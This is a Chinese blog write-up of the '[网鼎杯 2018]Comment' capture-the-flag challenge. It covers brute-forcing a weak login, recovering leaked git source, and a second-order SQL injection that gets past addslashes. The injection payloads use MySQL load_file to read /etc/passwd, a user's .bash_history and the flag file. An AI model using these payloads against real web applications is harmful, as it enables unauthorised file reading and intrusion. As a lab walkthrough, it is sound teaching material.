[网鼎杯 2018]Comment

最新推荐文章于 2022-09-15 23:13:17 发布
最新推荐文章于 2022-09-15 23:13:17 发布
阅读量2.5k 收藏
点赞数
分类专栏: BUUCTF 文章标签: sql 二次注入 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124065373
版权 
知识点:二次注入,mysql对存入的数据自动做处理,addslashes

登录页面已经告诉我们账号名,密码只要我们爆破一下就可以了。
在这里插入图片描述
爆破可得密码为:password=zhangwei666
在这里插入图片描述
有git源码泄露,它说我们无权访问,那就说明确实存在。
在这里插入图片描述
可以用GitHackhttps://github.com/BugScanTeam/GitHack获取源码

python2 GitHack.py http://b1414ff6-95be-4264-8dca-1faf6b4551cb.node4.buuoj.cn:81/.git/

但是代码不全,需要我们恢复一下,我们可以版本回滚一下。

回滚前先看一下历史记录

git log --all

在这里插入图片描述

在回到之前的版本

git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':#发布帖子
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    #sql语句,没有任何过滤,插入相应信息
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    #读取信息,同样没有任何过滤
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){#插入留言
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
                #插入留言

    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

addslashes函数会对一些字符做转义处理,例如'->\'

但是数据库在存入数据前,会对数据做过滤处理,也就是说\'又变为',会原样执行我们的查询。

我们在发布帖子的时候,如果令category=',content=user(),/*,那么他会把这条语句原样插入进去,具体作用我们接着往下看。
在这里插入图片描述
可以看到在comment里面它直接把查到的category赋值给sql,没有过滤。
在这里插入图片描述
最后在这里,上面的那条语句的作用就显示出来了,它把查到的category,带入语句,且把我们的留言也无过滤带入,那么如果我们令content=*/#
在这里插入图片描述
语句就会变为这样,且/*....*/中间的所有语句全被注释,且#后面的也被注释了,且我们发完留言它就会显示我们的留言,这边因为我们的注释,所以它会返回database()

$sql = "insert into comment
            set category = '',content=database(),/*',
                content = '*/#',
                bo_id = '$bo_id'";

步骤:
在这里插入图片描述
在这里插入图片描述
接下来按照上面的思路,读一下配置文件,',content=(select load_file('/etc/passwd')),/*,得到www的用户目录。

再读一下隐藏文件.bash_history ',content=(select load_file('//home/www/.bash_history')),/*,看看历史操作记录,它是进入/tmp/目录下操作的。
在这里插入图片描述
从中我们可以看到删除了一个文件,可能是flag。再看一可以看到/tmp/html下可以访问到

',content=(select hex(load_file("/tmp/html/.DS_Store"))),/*

然后16解码读取它,看到flag
在这里插入图片描述
然后读取flag

',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

同样16进制解码它,得到flag。
在这里插入图片描述

参考:
https://mayi077.gitee.io/2020/04/05/%E7%BD%91%E9%BC%8E%E6%9D%AF-2018-Comment/

succ3
关注
专栏目录
慕课网数据库
张晨光老师的播客
02-28 2185
javaEE慕课网数据库 /* Navicat MySQL Data Transfer Source Server : localhost_3306 Source Server Version : 50717 Source Host : localhost:3306 Source Database : mooc Target Server ...
[网鼎杯2018] Comment
Tmg3202915143的博客
08-27 1560
例如文件们的图标位置或者是背景色的选择。
网鼎杯2020朱雀组-web
ChenZIDu的博客
05-18 3082
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
comment hive_Hive中基本语法
weixin_39676021的博客
02-01 2924
1.Hive中数据库基本操作1.1 Create/Drop/Alter/Use Database```CREATE (DATABASE|SCHEMA) [IF NOT EXISTS] database_name[COMMENT database_comment][LOCATION hdfs_path][WITH DBPROPERTIES (property_name=property_value,...
pgsqlComment命令
深海微澜
11-01 5114
参考 Comment命令:定义或者改变一个对象的评注 语法: COMMENT ON { TABLE object_name | COLUMN table_name.column_name | AGGREGATE agg_name (agg_type [, ...] ) | CAST (sourcetype AS targettype) | CONSTRAINT cons...
BUUCTF之[网鼎杯 2018]Comment
m0_62107966的博客
09-15 1031
BUUCTF之[网鼎杯 2018]Comment 输入:*/# sql语句是换行的,所以我们无法用 单行注释符,必须用/**/拼接,用#闭合sql语句使其执行。可以看到执行成功,返回ctf这个库。首先发帖的时候必须登录,爆破弱密码登录,得到666是满足的后三位密码的。是一个类似留言板的界面,考虑二次注入,并且有git源码泄露。接下来尝试sql语句注入都失败了,看了大佬的wp,用sql来读取文件。在cmment中,对于category的值从数据库取出来没有进行转义
[网鼎杯 2018]Comment二次注入,git泄露,git恢复)
qq_45521281的博客
04-12 3332
进入题目是这样的 要发帖还必须登录 在这里已经给了你用户名并提示了密码;密码隐藏了后三位,我们可以用爆破爆破后面三位的方法: 由爆破状态码的密码后三位为666,登录进去就可以发帖了。接下来用dirsearch扫描,发现存在.git文件 那应该存在.git文件泄露,用GitHack下载发现有一个write_do.php,但是代码有缺失 查一下之前提交的版本,单独用git log不能全部显示,直...
buu-[网鼎杯 2018]Comment
qaq517384的博客
10-13 336
进入题目 发帖时提示要登录,密码用bp跑出来是666 然后这个发帖形式很像上一题的二次注入,先构造sql语句,后面在留言界面输出 稍微试了一下,有问题的都发不出留言 在f12控制台发现这样一句话后,在url后添加.git被403禁止了,说明有git泄露 githack载下来的源码跟没载一样 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./l
审计练习14——[网鼎杯 2018]Comment
qq_43756333的博客
06-06 407
平台:buuoj.cn 打开靶机是个留言板 发帖需要登录,只缺密码的后三位,burp爆破即可 扫下目录 git泄露,githacker源码下下来 write_do.php 显示不全 历史文件恢复一下 完整代码如下 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(); } if(isset($_GET[
mysql comment
最新发布
09-11
在MySQL中,`COMMENT`是一个用于添加注释的特性。它允许用户为数据库对象,如表、列、索引、触发器或存储过程等,提供额外的文字描述信息。这些注释不会影响数据本身,而是作为对数据库结构和逻辑的一种文档记录,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值